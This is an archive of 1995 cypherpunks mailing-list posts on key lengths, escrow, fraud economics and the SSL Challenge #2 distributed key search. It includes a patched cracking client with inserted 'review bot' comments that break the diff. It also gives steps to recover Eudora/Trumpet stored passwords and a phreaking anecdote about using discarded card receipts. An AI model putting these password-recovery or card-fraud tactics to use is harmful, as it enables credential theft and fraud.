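A rough way to put numbers on the key lengths asked about above, as an added example that is not part of the original message. It uses the 200000 to 400000 keys/sec rate and the 0xa000000000 to 0xafffffffff range reported in the "SSL Challenge #2" message elsewhere in this archive, and assumes that cost scales linearly with keys tried and that a trial costs the same at every key length.

```c
#include <stdio.h>

#define SECS_PER_DAY  86400.0
#define DAYS_PER_YEAR 365.25

/* 2^bits as a double; exact, since every value is a power of two. */
double keyspace(unsigned bits)
{
    double n = 1.0;
    while (bits--)
        n *= 2.0;
    return n;
}

/* Number of keys in the inclusive range [lo, hi]. */
double range_keys(unsigned long long lo, unsigned long long hi)
{
    return (double)(hi - lo) + 1.0;
}

/* Days needed to try `keys` keys at `rate` keys per second. */
double sweep_days(double keys, double rate)
{
    return keys / rate / SECS_PER_DAY;
}

/* Participants, each running at `rate` keys/sec, needed to exhaust a
 * `bits`-bit keyspace within `days` days (worst case: the right key is
 * the last one tried; the average case needs half as many). */
double participants_needed(unsigned bits, double rate, double days)
{
    return keyspace(bits) / (rate * days * SECS_PER_DAY);
}

int main(void)
{
    /* Rates and range quoted from the SSL Challenge #2 message. */
    const double slow = 200000.0, fast = 400000.0;
    const unsigned lengths[] = { 40, 64, 128 };
    double claimed = range_keys(0xa000000000ULL, 0xafffffffffULL);
    size_t i;

    printf("claimed range: %.0f keys, 1/%.0f of the 40-bit space\n",
           claimed, keyspace(40) / claimed);
    printf("sweep time:    %.1f to %.1f days\n",
           sweep_days(claimed, fast), sweep_days(claimed, slow));

    for (i = 0; i < sizeof lengths / sizeof lengths[0]; i++) {
        unsigned b = lengths[i];
        printf("%3u bits: %.3g years for one participant, "
               "%.3g participants to finish in a year\n",
               b,
               sweep_days(keyspace(b), fast) / DAYS_PER_YEAR,
               participants_needed(b, fast, DAYS_PER_YEAR));
    }
    return 0;
}
```

Each extra key bit doubles every figure, so 64 bits is 2^24 times the work of 40 bits and 128 bits is 2^64 times the work of 64 bits.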




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: zinc <zinc@zifi.genetics.utah.edu>
Date: Sat, 19 Aug 95 11:58:08 PDT
To: cypherpunks <cypherpunks@toad.com>
Subject: Re: Costs of Credit Card Fraud and Brute-Force Codebreaking
In-Reply-To: <9508191823.AA23991@all.net>
Message-ID: <Pine.LNX.3.91.950819125208.27374B-100000@zifi.genetics.utah.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sat, 19 Aug 1995, Dr. Frederick B. Cohen wrote:

> Date: Sat, 19 Aug 1995 14:23:14 -0400 (EDT)
> From: Dr. Frederick B. Cohen <fc@all.net>
> To: Flame Remailer <remailer@flame.alias.net>
> Cc: cypherpunks@toad.com
> Subject: Re: Costs of Credit Card Fraud and Brute-Force Codebreaking
> 
> > 
> But you miss the costs of your time.  You have to find the right
> dumpster, you have to dive, you have to find the slip, you have to walk
> across the street, you have to make the call.  Time, as they say, is
> money.  For a criminal enterprise to make money, they have to not only

howdy,

time is not money if you're a high school student with nothing else to 
do.  time is not money if you're a grad student.  i spend approx 14 hrs 
or more a day in the lab seven days a week.  there's no way my stipend 
adds up to anything close to minimum wage at that rate.  

the value of time is subjective.  if i had a wife and a couple of kids 
AND i was a grad student, my time would be worth more.  as it is, my time 
is not worth a whole lot.

your assessment that this cost our anon friend some money to obtain 
these cc numbers is simply not true.  when you have nothing else to do, 
choosing one thing over another involves no cost.  if anything, he made 
money by using the cc numbers to make long dist calls instead of using 
any cash he might have from working or an allowance.

my $0.02,

- -pjf


patrick finerty = zinc@zifi.genetics.utah.edu = pfinerty@nyx.cs.du.edu
U of Utah biochem grad student in the Bass lab - zinc fingers + dsRNA!
** FINGER zinc-pgp@zifi.genetics.utah.edu for pgp public key - CRYPTO!
zifi runs LINUX 1.2.11 -=-=-=WEB=-=-=->  http://zifi.genetics.utah.edu 


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMDY0T03Qo/lG0AH5AQEmuwP9F30sfk4PrGRqf5kqsKs1lcX67CSctU/z
hJEM8a1IFpPQL+FHRfy2eRueWNa1OiuyQZN8qt8EiP93MzScEJCEomxaTKowQjQk
p9cQKg2SsFmxgc4whS4Ny22x3Aw1FinB2DzlhPrDB6jLAT1cWkQrE7K85VSCcC+j
AVjV0CS0ufM=
=7tS0
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark C. Henderson" <mch@squirrel.com>
Date: Sat, 19 Aug 95 13:19:04 PDT
To: Duncan Frissell <cypherpunks@toad.com>
Subject: Re: So, NSA can break 64-bit keys
In-Reply-To: <199508191040.GAA20763@panix.com>
Message-ID: <9508191318.TE26772@squirrel.com>
MIME-Version: 1.0
Content-Type: text/plain


On Aug 19,  6:40, Duncan Frissell wrote:
> I guess this means no source code.  Are there any software encryption
> systems that can't be modified after the fact?

Undoubtedly, they'll set things up so that if one modifies the 
software to break the escrow feature, one won't be able to 
interoperate with "legitimate" users (i.e. those who haven't 
disabled the escrow feature). 


-- 
Mark Henderson -- markh@wimsey.bc.ca, henderso@netcom.com, mch@squirrel.com
PGP 1024/C58015E3 fingerprint=21 F6 AF 2B 6A 8A 0B E1 A1 2A 2A 06 4A D5 92 46
cryptography archive maintainer  --  ftp://ftp.wimsey.com/pub/crypto
ftp://ftp.netcom.com/pub/he/henderso/change-sun-hostid-1.4.8.tar.gz




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Sat, 19 Aug 95 11:08:02 PDT
To: howard@cs.ualberta.ca
Subject: Load-sharing for Key Cracking
Message-ID: <9508191807.AA22499@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


Someone should look at Condor, ftp.cs.uwisc.edu.
It's designed to share spare cycles.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Sat, 19 Aug 95 11:18:36 PDT
To: owner-cypherpunks@toad.com
Subject: Re: Certificates/Anonymity/Policy/True Names
Message-ID: <9508191818.AA22531@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


I think there are many people who might be willing to use an
"anon CA" should it exist:
	Whistleblowers, perhaps Deep Throat would have used email
	People writing letters to the editor who don't want to trust
		the editor to withhold their info
	People who desire anonymity yet don't want to trust the gov't
		to certify their communications as authentic/forged
		(Unabomber, Aum Shinrikyo)
	Any number of writers who have used pseudonyms and now want to
		get paid in ecash; Mark Twain?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Sat, 19 Aug 95 11:25:03 PDT
To: remailer@flame.alias.net (Flame Remailer)
Subject: Re: Costs of Credit Card Fraud and Brute-Force Codebreaking
In-Reply-To: <199508191631.SAA10338@utopia.hacktic.nl>
Message-ID: <9508191823.AA23991@all.net>
MIME-Version: 1.0
Content-Type: text


> 
> fc@all.net wrote:
> >I think a lot of people miss the distinction between automated message
> >cracking and dumpster diving.  Dumpster diving is not free.  It costs at
> >least a dollar each to get credit card slips by dumpster diving.
> >
> >Consider that in order to use the information, you have to get the slip,
> >pull off the numbers, enter them into a computer (or even worse yet,
> >create a phoney card or make a phone call) in order to use the
> >information.  The break-even point for an automated cracking and usage
> >system is more than a dollar per stolen card.  My parallel processor
> >is actually more cost effective for criminal theft via credit card fraud.
> 
> Well, a few years ago I partially satisfied my phone-phreaking habit in
> the following manner:
> I would walk up to a busy intersection in a commercial area and stroll
> through the various gas stations located there, collecting receipts
> that careless customers had forgotten to take with them after using the
> "pay-at-the-pump".  Then I would visit the pay phones at the nearby
> mini-malls.  It sure didn't cost me a dollar a number.

But you miss the costs of your time.  You have to find the right
dumpster, you have to dive, you have to find the slip, you have to walk
across the street, you have to make the call.  Time, as they say, is
money.  For a criminal enterprise to make money, they have to not only
get the cards, but use them and then resell the goods for cash.  The
sheer size of a criminal organization that could handle the sort of
codebreaking we are talking about would make it possible to buy goods at
wholesale prices, so the profit on stealing goods and reselling them on
the open market is far less than the savings an individual gains by the
effort.  Then there is the potential cost of people getting caught, etc. 
that has to be figured into the overall cost.  Criminal enterprises have
high overheads.

> The cost/value of a card number depends a lot on what you seek to gain.
> If it's free phone calls, your costs are basically nil.

It costs you 10-15 minutes of time, and it probably saves you a few
dollars of phone charges.  If the chance is only 1 in 100,000 of
getting caught and convicted to 5 years in prison, the amortised time
cost is another 25 minutes, not including legal fees.

>  If you want
> free gas, it'll cost you $500 or so for the card reader/writer and a
> few old cards.

But you still have to get the magic numbers.  Maybe it takes a bribe,
maybe it takes dumpster diving, but whatever the deal, it all costs
money in the form of time, overhead, etc.

>  If you have a system for extracting thousands of dollars
> from each card, economics of scale would probably justify the $10000
> rc4-breaker.

The point of the parallel processor is that the cost is about $1.45 (or
whatever) per card number, not thousands of dollars.  The results are in
computer-ready form, so that you can charge directly over the Internet
and have a fully automatic system for theft.  No large number of
employees, no phone bills that get traced by the FBI, only an Internet
link that moves from provider to provider, account to account, city to
city, country to country.

>  ...or you could just hack netcom, steal the mother lode
> and be set for life...  (Hi Kevin!  drop me a line when you get out;
> ya gotta love those plea-bargains - 30 year sentence reduced to 8
> months! ;-)

It's true that breaking into computer systems is cheaper for small
numbers, but as a big business, the labor is too high for this sort
of attack, and the results are too unpredictable.  Taking credit card
numbers over the net is a lot more amenable to the economies of scale
required for big codebreaking efforts.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chris Claborne <Chris.Claborne@SanDiegoCA.ATTGIS.COM>
Date: Sat, 19 Aug 95 14:31:12 PDT
To: cypherpunks <cypherpunks@toad.com>
Subject: Re: 64 bit keys breakable by the NSA or just some random key length?
Message-ID: <9508191730.aa02322@ncrhub1.ATTGIS.COM>
MIME-Version: 1.0
Content-Type: text/plain


At 12:51 PM 8/19/95 -0600, zinc wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>cpunks,
>
>i was thinking about the recent Clinton/LEA proposal regarding exportable 
>crypto.  the new rules would allow 64 bit keys to be exported, as long
>as the master key was made available through some key escrow service.
[good stuff deleted]

>since this *is* an escrow system, why didn't the gov't just go with
>the unbreakable 128 bit key length?  

   This is the kicker!  If what I heard is true, anyone can escrow the keys
under this new plan.  We know that the govt has no problem breaking its own
rules by saying the magic words "matter of national security", so why don't
they require the keys be held by the govt?
   ... You know they can break it.   ...  I guess they assume the middle
american will buy it!  Just kills me.  

                                        ...  __o
                                       ..   -\<,
Chris.Claborne@SanDiegoCA.ATTGIS.Com   ...(*)/(*).          CI$: 76340.2422
http://bordeaux.sandiegoca.attgis.com/
PGP Pub Key fingerprint =  A8 FA 55 92 23 20 72 69  52 AB 64 CC C7 D9 4F CA
Avail on Pub Key server.
PGP-encrypted e-mail welcome!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chris Claborne <Chris.Claborne@SanDiegoCA.ATTGIS.COM>
Date: Sat, 19 Aug 95 14:39:42 PDT
To: cypherpunks@toad.com
Subject: Re: The Official Cypherpunks Screen Saver?
Message-ID: <9508191738.ab02416@ncrhub1.ATTGIS.COM>
MIME-Version: 1.0
Content-Type: text/plain


At 11:49 AM 8/17/95 -0700, you wrote:
>At 5:11 PM 8/17/95, Jim Gillogly wrote:
>
>>I would hazard a guess that 90% of the compute cycles in the world are used
>>running screen savers... this gives a <lot> of slack for people who would
>>like to harness them to perform productive work like making points about
>>the strength of security.
>
>It would really be cool to have a screen saver that did useful work while
>displaying pretty pictures.
>
>Imagine a screen saver, maybe with code modules running in "After Dark,"
>that updates the screen with keys tried...could be a nice demonstration of

   With the strength of today's NT workstations (Multi-processor pentium and
Alpha chips) this would be a great idea.  Every NT workstation ships with a
screen saver built in.  I'd use that one.  Too much fun!
                                        ...  __o
                                       ..   -\<,
Chris.Claborne@SanDiegoCA.ATTGIS.Com   ...(*)/(*).          CI$: 76340.2422
http://bordeaux.sandiegoca.attgis.com/
PGP Pub Key fingerprint =  A8 FA 55 92 23 20 72 69  52 AB 64 CC C7 D9 4F CA
Avail on Pub Key server.
PGP-encrypted e-mail welcome!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sat, 19 Aug 95 12:09:49 PDT
To: cypherpunks@toad.com
Subject: Cypherpunks on IRC?
Message-ID: <199508191906.PAA27899@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Where do the CPs hang out on IRC?
I am just giving IRC another try and there was no CP channel (There is
now). Perhaps we are too busy writing code? <g>

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMDY13yoZzwIn1bdtAQHe7QF8CyJJsrUtP7RPckKwRegQ1yTUbL7wreip
moqo7qqcehtE5efi4aCHPMleBU7eZNH/
=DWBj
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sat, 19 Aug 95 12:17:13 PDT
To: cypherpunks@toad.com
Subject: Re: 64 bit keys breakable by the NSA or just some random key length?
Message-ID: <199508191913.PAA27964@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article
<Pine.LNX.3.91.950819123758.27374A-100000@zifi.genetics.utah.edu>,
zinc@zifi.genetics.utah.edu (zinc) wrote:


>why did the govt pick 64 bits?  is this length still within the range
>of the NSA if they really wanted to read something but didn't feel the
>need or want the exposure of obtaining a key from escrow?
>
>i'm curious if anyone thinks this gives us a little more info on the
>capabilities of the NSA regarding brute forcing a key.  additionally,
>since this *is* an escrow system, why didn't the gov't just go with
>the unbreakable 128 bit key length?  

I think the obvious conclusion would be because 64bits is crackable if
need be and if you have the resources the government has. Not for routine
monitoring of undesirables, but for those special cases where they don't
want to expose their activities by requesting a warrant.

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMDY3jSoZzwIn1bdtAQGV3gGA26/BZOnXiuMuO8IDgGCnnONVhVtL4/o1
5HVVD3Mqfjp3Sr7QJMQMrfD4JRWRphTL
=evHi
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Checkered Daemon <cdaemon@goblin.punk.net>
Date: Sat, 19 Aug 95 15:45:23 PDT
To: cypherpunks@toad.com
Subject: Re: SSL Challenge #2
In-Reply-To: <199508192042.QAA29044@calum.csclub.uwaterloo.ca>
Message-ID: <199508192242.PAA18690@goblin.punk.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----


>Is there a standard way we're supposed to get together to divvy up the
>keyspace?  Not knowing of any, I'll just announce that I'm working
>on those keys that start with "a", from 0xafffffffff down to 0xa000000000.

Thought the idea was to demonstrate how FAST we could all do this together,
rather than how SOON.  'Course, I could be wrong ...

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMDZoYYQO/w1Q7FIdAQG9FQP/ed4ZZrL5L1drbLb7pYGoxdSoL3GJ3m09
nxq3IK82ItCftC5l5/AlU324DpeSr4ZyXFTs0SrfpqGaX4EqDTqac40MWSjCpIGG
8+ROsVFx4sJJJwBeXgy0yIJU3hh67I/fT2DUhqJXtxB5yroHF8X2go51rVLFNmwd
lNI8v42bWvw=
=vokW
-----END PGP SIGNATURE-----
-- 
The Checkered Daemon			       	  cdaemon@goblin.punk.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 19 Aug 95 12:59:56 PDT
To: cypherpunks@toad.com
Subject: DAM_lyz
Message-ID: <199508191959.PAA08294@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Information Week of August 28 has a cover story on
   "Internet Theft." It sees security threats in "freeware
   public-key encryption algorithms and anonymous remailer
   programs." BlackNet is red-flagged. Laggard law is cited.

   "This is where all the crime will be in the 21st century,"
   says Joseph Seanor, a federal government intelligence
   veteran. "Law enforcement officials are trying to get a
   handle on it, but they really can't stop it." Seanor adds,
   "When it comes to technology, criminals always seem to be
   one step ahead of law enforcement."


   If you can't steal the damthing: DAM_lyz











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <mfroomki@umiami.ir.miami.edu>
Date: Sat, 19 Aug 95 13:07:45 PDT
To: Rich Salz <rsalz@osf.org>
Subject: Re: Certificates/Anonymity/Policy/True Names
In-Reply-To: <9508191818.AA22531@sulphur.osf.org>
Message-ID: <Pine.3.89.9508191641.A620955565-0100000@umiami.ir.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


But this is precisely the issue: what does the *certificate* get any of 
these people that a simple digital signature does not provide?

On Sat, 19 Aug 1995, Rich Salz wrote:

> I think there are many people who might be willing to use an
> "anon CA" should it exist:
> 	Whistleblowers, perhaps Deep Throat would have used email
> 	People writing letters to the editor who don't want to trust
> 		the editor to withhold their info
> 	People who desire anonymity yet don't want to trust the gov't
> 		to certify their communications as authentic/forged
> 		(Unabomber, Aum Shinrikyo)
> 	Any number of writers who have used pseudonyms and now want to
> 		get paid in ecash; Mark Twain?
> 

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | mfroomki@umiami.ir.miami.edu
U. Miami School of Law     | 
P.O. Box 248087            | It's hot here.  And humid.
Coral Gables, FL 33124 USA |
See http://www-swiss.ai.mit.edu/6095/articles/froomkin-metaphor/text.html
and http://www.law.cornell.edu/jol/froomkin.htm





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andre Bacard <abacard@well.com>
Date: Sat, 19 Aug 95 16:24:55 PDT
To: abacard@well.com
Subject: EFF, Mike Godwin, Cliff Stoll
Message-ID: <199508192318.QAA27920@well.com>
MIME-Version: 1.0
Content-Type: text/plain


 
                      *** PLEASE REDISTRIBUTE FREELY ***
Hello CyberFolks,
 
Wednesday, August 16th BayFF (Bay Area Chapter of EFF) held a meeting in
San Francisco with speakers Mike Godwin and Cliff Stoll. Attached are a
few notes for those of you who missed the opportunity to attend.
 
See you in the future,
Andre Bacard
======================================================================
abacard@well.com                    Bacard wrote "The Computer Privacy
Stanford, California                Handbook" [Intro by Mitchell Kapor].
http://www.well.com/user/abacard    Published by Peachpit Press, (800)
Enjoy your privacy...               283-9444, ISBN # 1-56609-171-3.
=======================================================================
 
                  Notes from the BayFF Semi-Underground
                              Authorized by
                     Andre Bacard <abacard@well.com>
 
Wednesday, August 16, 1995, I found myself cruising through Golden Gate
Park. Suddenly I swerved into the right lane and shouted "Eureka." For
those who don't know, Eureka is the California state motto which, in the
tradition of the Gold Rush, means "I found it!" In San Francisco IT means
a parking place. Feeling euphoric about my good fortune, I started the
short walk long on memories towards the Haight-Ashbury district. It was
delightful and fogless. The salty air was cool. The smell of grass (the
type that city gardeners mow) was fresh. Passing a guitarist, I thought
of the Grateful Dead's Jerry Garcia, recently deceased. My mind flashed
back twenty-five years ago when I first visited Haight-Ashbury. Twenty-
five years ago at the dawn of the Computer Age... So many silicon chips
under the bridge... I thought of all the people in the Haight mourning
Garcia and donating to the Haight-Ashbury Free Clinic in Garcia's memory.
I flashed back upon my first meeting with John Perry Barlow, lyricist for
the Grateful Dead and co-founder of EFF. That meeting helped inspire me
to write COMPUTER PRIVACY HANDBOOK. Such were a few of the images that
danced through my mind as I entered the Cole & Page Street Public
Library... It was appropriate to be attending an EFF meeting.
 
John Gilmore, EFF Board Member, was the first person I saw. Gilmore
reminds me of a lean Cheshire cat. He has a mischievous smile as if to
say, "You won't believe what just happened." Maybe we'll never discover
what just happened with John, since he's so much into crypto. In any
case, Gilmore introduced Mike Godwin as "The first lawyer in Cyberspace
and EFF's first employee."
 
Mike Godwin ("a cool guy who survived law school with his personality
intact" according to an anonymous EFF publicist) spoke for 90 minutes
about how to deal with reporters and, more specifically, about his role
in trying to correct the damage done to cyberspace by TIME's infamous
"CyberPorn" cover story. Godwin detailed many flaws in Carnegie Mellon
University undergraduate Mr. Rimm's study of cyberporn that led to the
"CyberPorn" piece. Godwin said of Rimm's paper: "It's as if you surveyed
the bookstores in Times Square in Manhattan and generalized to all
bookstores in America."
 
Cliff Stoll ("a wild and crazy guy with interesting hair" according to
the same anonymous EFF publicist) is the author of the best-selling book
SILICON SNAKE OIL. Stoll personifies the eccentric heritage of the San
Francisco counter-culture. With lots of humor and drama, Stoll presented
a critical view of the Internet. "The Internet is a perfect diversion
from learning" and "The Internet opens many doors that lead to empty
rooms" were two of his many memorable lines. Stoll noted that wisdom and
experience play little role in the Computer Cult (i.e., all the Hype
surrounding the Information Superhighway).
 
The EFF events that I've attended at WIRED's office in the San Francisco
Mission District and last night are well worth the hassle of hunting down
a parking place.
 
To learn more about future monthly BayFF meetings, send this e-mail:
 
      To: listserv@eff.org
      Subject: [ignore]
      subscribe BayFF
 
See you at future events,
Andre Bacard
 
P.S. I'm the guy with the fedora hat who people mistake for Indiana
Jones.
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ian Goldberg <iagoldbe@calum.csclub.uwaterloo.ca>
Date: Sat, 19 Aug 95 13:42:32 PDT
To: cypherpunks@toad.com
Subject: Re: SSL Challenge #2
Message-ID: <199508192042.QAA29044@calum.csclub.uwaterloo.ca>
MIME-Version: 1.0
Content-Type: text/plain


Is there a standard way we're supposed to get together to divvy up the
keyspace?  Not knowing of any, I'll just announce that I'm working
on those keys that start with "a", from 0xafffffffff down to 0xa000000000.

I seem to be getting about 200000 to 400000 keys/sec, so it should take
about another 2 days (assuming the machines stay up that long...).

If anyone wants to join in, feel free.  Get original source from
http://pauillac.inria.fr/~doligez/ssl/slave.c (Damien's code),
and patch it with the diff at the bottom.  Note: I don't think there's
any crypto in the diff, and the rest of the sources are in France, so this
should be OK with the spooks. But you never know...

Compile the patched source on anything you can get, and run

./slave -t -d csclub.uwaterloo.ca 9114

The IP is 129.97.134.11 if you need it.  You can add -v or -V for more
verbosity, and -n num if you have num processors.

   - Ian "REALLY hoping I didn't screw up the code..."

--- dist/slave.c	Thu Aug 17 15:19:52 1995
+++ slave.c	Sat Aug 19 13:54:25 1995
@@ -297,18 +297,18 @@
   register int i;
 
   /* set up the block of data */
-#define x0 0xb894890e
-#define x1 0x2eb90ebf
-  x2 = 0x00074450 + ((~stpoint << 4) & 0xff000000);
-#define x4 0xa784af30
-#define x5 0x6913f879
-#define x6 0x539b2520
-#define x7 0x75ae60a0
-#define x8 0x90ebbf51
-#define x9 0xe10c2cf8
-#define x10 0x11ac18ea
-#define x11 0x2114834c
-#define x12 0x000080b6
+#define x0 0x9109c0fb
+#define x1 0x15a61060
+  x2 = 0x00368f3f + ((~stpoint << 4) & 0xff000000);
+#define x4 0x7bea0730
+#define x5 0x61eb659d
+#define x6 0x7441bbfa
+#define x7 0x5f3a45e8
+#define x8 0x38e6d5c6
+#define x9 0xa1a88cd6
+#define x10 0xf82ecaae
+#define x11 0x0296e2c8
+#define x12 0x000080a4
 #define x13 0x00000000
 #define x14 0x00000188
 #define x15 0x00000000
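Review bot: the replacement values for x0 through x12 carry no comment saying which challenge message they were taken from or how they were derived, and a single mistyped hex digit in this block would make every worker sweep its range without ever reporting a hit. Add a comment above the block naming the source record, and have a second person check the words against it.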
@@ -506,7 +506,7 @@
   int w;
   
   strcpy (progname, "worker");
-  nice (40);
+  nice (5);
   while (1){
     sock = open_socket ();
     if (sock == -1){
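Review bot: nice (40) becomes nice (5) with no explanation, so the worker now competes much harder with the machine's other users, and the return value is still unchecked. If the aim is a faster sweep, make the increment a command-line option with the old value as its default rather than hard-coding 5.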
@@ -547,7 +547,11 @@
 
   Verb1 ("SIGCHLD received\n");
   while (1){
+#if 0
     pid = wait3 ((void *) &chldstat, WNOHANG, NULL);
+#else
+    pid = waitpid ((pid_t)-1, (void *) &chldstat, WNOHANG);
+#endif
     if (pid <= 0) break;
     Verb2 ("got child: %ld\n", pid);
     for (i = 0; i < nproc; i++){
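Review bot: the wait3 call is left behind under #if 0 instead of being deleted or selected by a feature test, and the new waitpid call keeps the (void *) cast on &chldstat, which hides whether chldstat is the int that waitpid expects. Select the variant with a named macro (or drop wait3) and pass a plain int status so no cast is needed.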
@@ -610,6 +614,7 @@
     }
   }
   if (!ignore_ttys){    /* then look at ttys */
+#if 0
     d = opendir ("/dev");
     if (d == NULL) fatal ("opendir");
     while (1){
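Review bot: the #if 0 opened just after if (!ignore_ttys){ (closed by the #endif in the next hunk) compiles out the whole /dev scan and leaves the branch empty, so the tty check silently does nothing whatever the option says. If the scan does not build on the target system, say so in a comment and guard it with a named portability macro instead of #if 0.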
@@ -629,6 +634,7 @@
       }
     }
     if (errno) fatal ("readdir");
+#endif
   }
 }
 
@@ -901,7 +907,7 @@
   if (entry == NULL) fatal ("gethostbyname");
   memcpy (&serverhost, entry, sizeof (serverhost));
 
-  sanity_check ();
+  /* sanity_check (); */
   speed_test ();
   init_devices ();
   supervisor ();
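Review bot: sanity_check () is commented out at startup with no reason given, in the same patch that replaces the data block constants, so nothing visible here verifies the new values before the sweep begins. Rather than disabling it, update whatever expected values it tests (assuming from its name that it is a self-test) for the new block, or at least state in the comment why it cannot run.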



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 19 Aug 95 13:43:44 PDT
To: cypherpunks@toad.com
Subject: Spooks and Hackers Inc
Message-ID: <199508192043.QAA11639@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Eye-catching quote in the Info Week story on Internet theft:


   Another threat is the growing number of information brokers
   who use online communications to match buyers and sellers.
   An increasing number of these brokers -- many of whom are
   former government intelligence employees in the United
   States and Eastern Europe -- work closely with hackers
   dealing in illicit data.

   "The biggest security problem organizations face today is
   information brokers," says Dan White, national director of
   information security at Ernst & Young in Chicago. "Since
   the end of the Cold War there have been a lot of people
   trained in espionage who don't have a lot to do."













From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Josh M. Osborne" <stripes@va.pubnix.com>
Date: Sat, 19 Aug 95 14:04:00 PDT
To: cypherpunks@toad.com
Subject: Liability for Key Cracking via Java scripts?
In-Reply-To: <ac5b5ee423021004e6b5@[205.199.118.202]>
Message-ID: <RAA17871.199508192103@garotte.va.pubnix.com>
MIME-Version: 1.0
Content-Type: text/plain


Tim May's post got me thinking...

Assume that Java became "trusted" by most people on the Internet.
(Java is a safe subset of the Oak language, it can be interpreted,
or compiled.  One of the proposed uses is to embed it in Web
browsers.  The compiled form is roughly as fast as C++ code.)

Assume that some sort of secure low transaction cost fund 
transfer system is available.


I believe that's all the technology you need for selling idle CPU
cycles.  Would it take off?  Raytracing (and other types of rendering)
and key cracking are the only two uses I can think of off the top
of my head (you need a relatively low amount of communication between
processes, the ability to survive some results never coming back
(and coming back out-of-order), and preferably the script and data
it works on need to be smallish)


Then I thought some more...  if Java really does get embedded in web
browsers (Netscape announced that they were going to do it... it is
somewhere on their press release page), what's to prevent the Java
animated icon widget things from doing more than just animating the
dancing stick figure?  What if it cracks keys while dancing?  I think
Java "applets" are allowed to make some form of IP connections, if
they are, what's the liability for _inadvertent_ key cracking?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Markku-Juhani Saarinen <marks@evitech.fi>
Date: Sat, 19 Aug 95 07:08:03 PDT
To: "Sean A. Walberg" <sean@escape.ca>
Subject: Re: Eudora/Trumpet encryption (stupid, solved here)
In-Reply-To: <Pine.SOL.3.91.950816110927.4127G-100000@wpg-01.escape.ca>
Message-ID: <Pine.3.89.9508191650.A25524-0100000@evitech.evitech.fi>
MIME-Version: 1.0
Content-Type: text/plain



On Wed, 16 Aug 1995, Sean A. Walberg wrote:

> I'm a crypto newbie here, but does anybody know how Trumpet Winsock 
> and/or Eudora encrypt the passwords in their .ini files?  I am trying to 
> write a front end for a client and would rather it set up automatically 
> rather than the program ask.
> 

It's not xor. It's wrap-around addition. Not much better than rot-13 :) I 
broke it for my friend just a couple of days back, but it seems like he 
has deleted the source I wrote at his place (cryptanalysis and writing the 
4-line c-source took about 20 minutes, total). Besides the key (the one 
used in encryption of the password) may be different in different 
versions and licences of these programs.

Here's what you'll have to do to get the built-in key:

1. set password to 00000000, for example, and see what it encrypts into.
2. now subtract 0x30 (ascii 0) from every character of the encrypted 
   password. congratulations, you have the key! :)

Now you can pretty much figure out how to decrypt any password.

Note:
Encrypted characters are in the range 32..127. First perform a logical
and with 0x7f. If the result is smaller than 32, add 32.

- mark
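
The key-recovery steps above, as an added example that is neither the poster's lost source nor either product's code. It assumes wrap-around addition modulo 96 over the printable range 32..127 and uses a constructed 8-byte key (`DEMO_KEY`), so the real programs' arithmetic and key may differ; it shows why a password stored under a built-in key should be treated as stored in the clear.

```c
#include <stdio.h>
#include <string.h>

/* Assumptions of this example, not facts about Trumpet or Eudora:
 * addition wraps modulo 96 over printable characters 32..127, and the
 * key is 8 bytes long and repeats for longer passwords. */
#define LO     32
#define SPAN   96
#define KEYLEN 8

/* Constructed key, standing in for the one built into the program. */
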